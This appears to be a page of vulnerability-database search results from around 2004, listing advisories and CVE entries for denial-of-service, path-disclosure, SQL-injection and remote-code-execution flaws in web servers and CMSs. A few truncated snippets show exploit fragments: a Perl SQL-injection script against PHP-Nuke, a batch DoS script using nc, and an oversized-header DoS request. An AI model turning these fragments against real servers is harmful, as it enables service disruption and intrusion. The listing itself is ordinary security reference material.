5900 matches found
JanaServer 2 - Multiple Remote Denial of Service Vulnerabilities
source: https://www.securityfocus.com/bid/11780/info JanaServer 2 is a commercially available proxy server designed for the Microsoft Windows platform. It contains support for services such as HTTP, FTP, email, and RealPlayer streaming. Multiple remote denial of service vulnerabilities affect...
GLSA-200411-18 : Apache 2.0: Denial of Service by memory consumption
The remote host is affected by the vulnerability described in GLSA-200411-18 Apache 2.0: Denial of Service by memory consumption Chintan Trivedi discovered a vulnerability in Apache httpd 2.0 that is caused by improper enforcing of the field length limit in the header-parsing code. Impact : By...
[SA13040] Caudium HTTP Request Processing Denial of Service
TITLE: Caudium HTTP Request Processing Denial of Service SECUNIA ADVISORY ID: SA13040 VERIFY ADVISORY: http://secunia.com/advisories/13040/ CRITICAL: Moderately critical IMPACT: DoS WHERE: From remote SOFTWARE: Caudium 1.x http://secunia.com/product/4196/ DESCRIPTION: A vulnerability has been...
Global Spy Software Cyber Web Filter 2 - IP Filter Bypass
source: https://www.securityfocus.com/bid/11562/info Global Spy Software Cyber Web Filter is affected by an IP filter bypass vulnerability. This issue is due to a failure of the application to properly handle exceptional HTTP requests. An attacker may leverage this issue to bypass filters based o...
Icecast 2.0.1 (Win32) - Remote Code Execution (1)
/ by Luigi Auriemma Shellcode add-on by Delikon www.Delikon.de Because of all the forbidden bytes in a http get request i had to use a very small shellcode, which was blown up by Msf::Encoder::PexAlphaNum. Great encoder. -------------------------------------------------------------------------...
PHP-Nuke SQL Injection Edit/Save Message(s) Bug
No description provided by source. !/usr/bin/perl use LWP; $log = "poskomenphpnukesavemsg.txt"; $Agent = "Mbahmubangga/1.0"; $proxy = "http://172.9.1.11:80/"; proxy:port ... $browser = LWP::UserAgent-new; $browser - agent$Agent; $url = 'http://www.sitewithphpnuke.com/admin.php'; $browser-proxyhtt...
[UNIX] vBulletin SQL Injection While Verifying Subscription Information
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
Limbo CMS <= 1.0.4.2 Multiple Vulnerabilitiesa
Binary data 3526.prm...
CVE-2004-1720
The 1 address.html and possibly 2 calendar.html pages in Merak Mail Server 5.2.7 allow remote attackers to gain sensitive information via an invalid HTTP request, which reveals the installation path. NOTE: it is unclear whether the calendar.html is an exposure, since the path is leaked in web log...
CVE-2004-0662
PowerPortal 1.x allows remote attackers to gain sensitive information via invalid or missing parameters in HTTP requests to 1 resize.php or 2 modules.php, which reveals the path in an error message...
CVE-2004-1749
Attack Mitigator IPS 5500 3.11.008, and possibly other versions, when configured in a one-armed routing configuration, allows remote attackers to cause a denial of service CPU consumption via a large number of HTTP requests...
Xitami Web Server - Denial of Service
if '%1'=='' echo Usage:%0 target port&&goto :eof set PORT=80 if not '%2'=='' set PORT=%2 for %%n in nc.exe do if not exist %%$PATH:n if not exist nc.exe echo Need nc.exe&&goto :eof echo GET / HTTP/1.0http.tmp echo HOST: %1http.tmp echo DOShttp.tmp echo.http.tmp nc -w 10 %1 %PORT% http.tmp del...
Lexmark Multiple HTTP Servers - Denial of Service
Lexmark Multiple HTTP Servers - Denial of Service GET / HTTP/1.0\r\n /Host:AAAAAA1024. milw0rm.com 2004-07-22...
Gattaca Server 2003 - 'Language' Path Exposure
source: https://www.securityfocus.com/bid/10729/info It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities. By sending HTTP requests to Gattaca's web server, it is reportedly possible to cause the application to return error pages that contain the full...
Gattaca Server 2003 - Null Byte Full Path Disclosure
source: https://www.securityfocus.com/bid/10729/info It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities. By sending HTTP requests to Gattaca's web server, it is reportedly possible to cause the application to return error pages that contain the full...
Gattaca Server 2003 - Language Path Exposure
Gattaca Server 2003 - Language Path Exposure source: https://www.securityfocus.com/bid/10729/info It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities. By sending HTTP requests to Gattaca's web server, it is reportedly possible to cause the application to retu...
Gattaca Server 2003 - Null Byte Full Path Disclosure
Gattaca Server 2003 - Null Byte Full Path Disclosure source: https://www.securityfocus.com/bid/10729/info It is reported that Gattaca Server 2003 contains multiple path disclosure vulnerabilities. By sending HTTP requests to Gattaca's web server, it is reportedly possible to cause the application...
CVE-2004-0662
PowerPortal Path Disclosure (CVE-2004-0662) affects PowerPortal 1.x. The OpenVAS entry documents a remote vulnerability in the PHP-based PowerPortal CMS where an attacker can cause the product to disclose the installation path by abusing invalid or missing parameters in resize.php or modules.php....
CVE-2004-0662
PowerPortal 1.x allows remote attackers to gain sensitive information via invalid or missing parameters in HTTP requests to 1 resize.php or 2 modules.php, which reveals the path in an error message...
FreeBSD : mplayer heap overflow in http requests (5e7f58c3-b3f8-4258-aeb8-795e5e940ff8)
A remotely exploitable heap buffer overflow vulnerability was found in MPlayer's URL decoding code. If an attacker can cause MPlayer to visit a specially crafted URL, arbitrary code execution with the privileges of the user running MPlayer may occur. A visit' might be caused by social engineering...